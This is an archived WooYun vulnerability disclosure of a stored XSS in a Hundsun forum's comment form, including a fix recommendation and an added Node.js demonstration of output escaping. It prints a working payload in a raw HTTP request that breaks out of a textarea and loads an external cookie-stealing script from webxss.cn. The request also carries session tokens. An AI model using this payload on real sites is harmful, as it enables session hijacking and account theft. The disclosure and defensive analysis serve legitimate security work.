
Vulnerability summary

Defect ID: wooyun-2015-0149217

Title: Stored XSS on a Hundsun site that hits wherever it is pointed

Vendor: hundsun.com

Author: 路人甲

Submitted: 2015-10-26 11:58

Fixed: 2015-12-14 15:12

Published: 2015-12-14 15:12

Type: XSS (cross-site scripting)

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-10-26: Details sent to the vendor, awaiting vendor response
2015-10-30: Vendor confirmed; details disclosed to the vendor only
2015-11-09: Details disclosed to core white hats and domain experts
2015-11-19: Details disclosed to regular white hats
2015-11-29: Details disclosed to intern white hats
2015-12-14: Details disclosed to the public

Brief description:

Today is Programmers' Day, and it's the SegmentFault hackathon... bound to be an all-nighter. Digging a bug on the side of the marathon to take a breather...
A stored XSS on a Hundsun site that hits wherever it is pointed; it can hit an administrator if the admin views or replies to the post!
Dear WooYun admins, please mask the cookies = =

Detailed description:

http://bbs.ihoms.com


[Screenshot: 2015-10-24 8.40.48 PM]


POST /bbs/comment.jspx HTTP/1.1
Host: bbs.ihoms.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://bbs.ihoms.com/bbs/cljs/7785.htm
Cookie: JSESSIONID=C813A5D1011E8D153F1EEC95B49E9BF3; 468789num=1; 468789=0; Hm_lvt_79a9c65d5515cfe58b53c7a4713c5c36=1445605317,1445690368; CNZZDATA1253385535=373586077-1445604000-http%253A%252F%252Fwww.ihoms.com%252F%7C1445690172; clientlanguage=zh_CN; Hm_lpvt_79a9c65d5515cfe58b53c7a4713c5c36=1445690394; User-Auth-Token=bb04887d5160e6eb08ca58f258f0867e; X-Auth-Token="15372414689:1445694023272:3e062d161000f256e5edc39c498181a8"; X-CN-NAME=15372414689
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
contentId=7785&path=cljs&text=</textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fwebxss.cn%2FHztDsb%3F%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>%3Cdiv+id%3D%22xunlei_com_thunder_helper_plugin_d462f475-c18e-46be-bd10-327458d045bd%22%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3Cimg+src%3D%22http%3A%2F%2F111%22+alt%3D%22%22+%2F%3E


[Screenshot: 2015-10-24 8.44.23 PM]


[Screenshot: 2015-10-24 8.45.28 PM]


Got the cookie.

[Screenshot: 2015-10-24 8.49.10 PM]


Fix recommendation:

Filter and encode the comment text.
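As an added illustration (not code from the report, and not the site's own code), the following Node.js snippet takes the comment text and onerror handler exactly as captured in the request above. It shows that concatenating the stored text into a comment-box template lets it close the textarea and inject an img tag with an onerror handler, that HTML-escaping the value on output keeps it inert, and it decodes the eval(unescape(/.../.source)) wrapper to reveal the loader the handler runs. The textarea template is an assumption inferred from the payload's leading </textarea>; the site's actual markup was not shown in the report.

```javascript
// Added example, not from the original report or the vendor's code.
// Demonstrates the stored-XSS breakout from the captured request and the
// output-encoding fix. The <textarea> template is an assumption inferred
// from the payload's leading </textarea>.

// The onerror handler exactly as it appears in the captured request body.
const ONERROR = 'eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fwebxss.cn%2FHztDsb%3F%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source))';

// The submitted `text` field, up to and including the `>` that closes the img tag.
const PAYLOAD = `</textarea>'"><img src=# id=xssyou style=display:none onerror=${ONERROR};//>`;

// Minimal HTML entity encoder covering element-content and quoted-attribute contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  }[c]));
}

// Vulnerable rendering (assumed template): the stored comment is concatenated
// straight into the page, so "</textarea>" in the data ends the element early.
function renderCommentUnsafe(text) {
  return `<textarea name="text">${text}</textarea>`;
}

// Hardened rendering: same template, untrusted value escaped for its context.
function renderCommentSafe(text) {
  return `<textarea name="text">${escapeHtml(text)}</textarea>`;
}

// Count literal tags in the output; untrusted data must not add any beyond
// the two the template itself contributes.
function countTags(html) {
  return (html.match(/<\/?[a-z][^>]*>/gi) || []).length;
}

// Recover the second-stage loader hidden in eval(unescape(/.../.source)).
// The payload used unescape(); decodeURIComponent gives the same result here
// because the encoded string contains no %uXXXX sequences.
function decodeLoader(handler) {
  const m = /unescape\(\/(.*?)\/\.source\)/.exec(handler);
  return m ? decodeURIComponent(m[1]) : null;
}

console.log('unsafe tag count:', countTags(renderCommentUnsafe(PAYLOAD)));
console.log('safe tag count:  ', countTags(renderCommentSafe(PAYLOAD)));
console.log('decoded loader:  ', decodeLoader(ONERROR));
```

Run it with node. The escaping has to be applied at every point the stored comment is rendered, not just in the reply box, because the same text is served to every later visitor, including administrators; that is what makes this stored rather than reflected. Marking the session cookies HttpOnly would additionally keep document.cookie out of reach of a script like the decoded loader, though it does not prevent other actions taken with the victim's session.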

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-10-30 15:10

Vendor reply:

Thank you very much for your report; it has been handled.

Latest status:

None yet

